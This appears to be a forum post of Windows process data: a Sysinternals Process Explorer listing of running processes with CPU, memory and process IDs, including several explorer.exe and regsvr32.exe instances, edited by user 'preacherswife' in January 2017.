smartscreen.exe 11,676 K 24,744 K 3824 SmartScreen Microsoft Corporation
smss.exe 384 K 832 K 340
SMSvcHost.exe 21,148 K 4,028 K 2832 SMSvcHost.exe Microsoft Corporation
spoolsv.exe 7,840 K 10,364 K 1704 Spooler SubSystem App Microsoft Corporation
svchost.exe 2,684 K 5,868 K 4800 Host Process for Windows Services Microsoft Corporation
svchost.exe 2,012 K 3,816 K 1560 Host Process for Windows Services Microsoft Corporation
svchost.exe 2,336 K 3,960 K 2056 Host Process for Windows Services Microsoft Corporation
svchost.exe 1,104 K 2,708 K 2152 Host Process for Windows Services Microsoft Corporation
svchost.exe 3,920 K 4,916 K 2036 Host Process for Windows Services Microsoft Corporation
svchost.exe 8,580 K 20,512 K 2076 Host Process for Windows Services Microsoft Corporation
svchost.exe 4,024 K 5,584 K 1300 Host Process for Windows Services Microsoft Corporation
svchost.exe 6,452 K 19,520 K 3668 Host Process for Windows Services Microsoft Corporation
svchost.exe 8,340 K 15,376 K 1152 Host Process for Windows Services Microsoft Corporation
svchost.exe 14,520 K 15,508 K 1216 Host Process for Windows Services Microsoft Corporation
svchost.exe 20,400 K 17,104 K 1316 Host Process for Windows Services Microsoft Corporation
svchost.exe 5,012 K 10,404 K 2180 Host Process for Windows Services Microsoft Corporation
svchost.exe 5,164 K 10,028 K 840 Host Process for Windows Services Microsoft Corporation
svchost.exe 1,176 K 3,372 K 1580 Host Process for Windows Services Microsoft Corporation
svchost.exe 14,928 K 15,924 K 412 Host Process for Windows Services Microsoft Corporation
SystemSettingsBroker.exe 2,372 K 11,492 K 3704 System Settings Broker Microsoft Corporation
w3wp.exe 4,304 K 9,172 K 4340
wininit.exe 1,036 K 2,484 K 560
winlogon.exe 2,052 K 5,444 K 604
WUDFHost.exe 2,052 K 4,720 K 1120
Memory Compression < 0.01 460 K 108,624 K 2240
svchost.exe < 0.01 5,328 K 14,552 K 1340 Host Process for Windows Services Microsoft Corporation
services.exe < 0.01 3,100 K 4,856 K 676
SASCore64.exe < 0.01 2,032 K 3,464 K 2044
svchost.exe < 0.01 10,104 K 17,160 K 772 Host Process for Windows Services Microsoft Corporation
hpqtra08.exe 0.01 8,908 K 19,144 K 4988 HP Digital Imaging Monitor Hewlett-Packard Co.
explorer.exe 0.01 4,028 K 6,948 K 5132 Windows Explorer Microsoft Corporation
lsass.exe 0.01 5,752 K 10,224 K 684 Local Security Authority Process Microsoft Corporation
regsvr32.exe 0.01 6,096 K 7,456 K 6408 Microsoft© Register Server Microsoft Corporation
Dropbox.exe 0.02 110,760 K 72,388 K 3388 Dropbox Dropbox, Inc.
svchost.exe 0.03 131,164 K 43,496 K 1012 Host Process for Windows Services Microsoft Corporation
SUPERANTISPYWARE.EXE 0.03 16,112 K 5,932 K 4716 SUPERAntiSpyware Application SUPERAntiSpyware
explorer.exe 0.05 40,640 K 82,312 K 3588 Windows Explorer Microsoft Corporation
SearchIndexer.exe 0.06 19,124 K 16,664 K 2416 Microsoft Windows Search Indexer Microsoft Corporation
svchost.exe 0.14 3,308 K 8,784 K 1476 Host Process for Windows Services Microsoft Corporation
csrss.exe 0.31 2,524 K 5,044 K 540
firefox.exe 0.38 172,984 K 153,432 K 4656 Firefox Mozilla Corporation
System Idle Process 0.48 0 K 4 K 0
NisSrv.exe 0.52 27,056 K 21,728 K 3972 Microsoft Network Realtime Inspection Service Microsoft Corporation
taskhostw.exe 0.71 35,496 K 43,296 K 3696 Host Process for Windows Tasks Microsoft Corporation
dwm.exe 1.04 32,128 K 29,864 K 932
svchost.exe 1.14 105,176 K 107,024 K 968 Host Process for Windows Services Microsoft Corporation
Interrupts 1.53 0 K 0 K n/a Hardware Interrupts and DPCs
firefox.exe 1.66 353,072 K 333,192 K 6920 Firefox Mozilla Corporation
regsvr32.exe 1.75 17,504 K 18,632 K 6180 Microsoft© Register Server Microsoft Corporation
procexp64.exe 2.02 18,932 K 48,636 K 8880 Sysinternals Process Explorer Sysinternals - www.sysinternals.com
System 2.07 148 K 9,308 K 4
explorer.exe 4.55 21,424 K 21,176 K 5532 Windows Explorer Microsoft Corporation
MsMpEng.exe 4.92 133,916 K 93,384 K 1496 Antimalware Service Executable Microsoft Corporation
explorer.exe 5.69 25,272 K 58,536 K 8552 Windows Explorer Microsoft Corporation
explorer.exe 9.73 54,148 K 86,580 K 8252 Windows Explorer Microsoft Corporation
regsvr32.exe 26.58 110,496 K 134,556 K 32 Microsoft© Register Server Microsoft Corporation
explorer.exe 34.53 312,520 K 315,520 K 10012 Windows Explorer Microsoft Corporation
Edited by preacherswife, 11 January 2017 - 01:31 PM.